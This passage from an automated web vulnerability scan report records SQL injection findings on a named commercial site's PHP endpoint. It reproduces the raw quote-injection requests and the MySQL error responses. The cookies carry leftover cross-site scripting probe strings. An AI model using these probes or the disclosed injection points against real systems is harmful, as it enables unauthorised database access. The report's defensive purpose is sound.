OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:26:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vrshkoul53rd5ib73dipcm5k61; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project_dynamic_page_updated.php was not found on this server.</p>

1.279. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3n3hjc724f45sodvbjdqo6mk93; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1'=1' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=to30niikabv4pvvj6aasctuh76; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project_dynamic_page_updated.php was not found on this server.</p>

1.280. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:27:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1n2pm08o6h1fqss1e7unm5t9i7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3'' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&templa' at line 5

Request 2

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 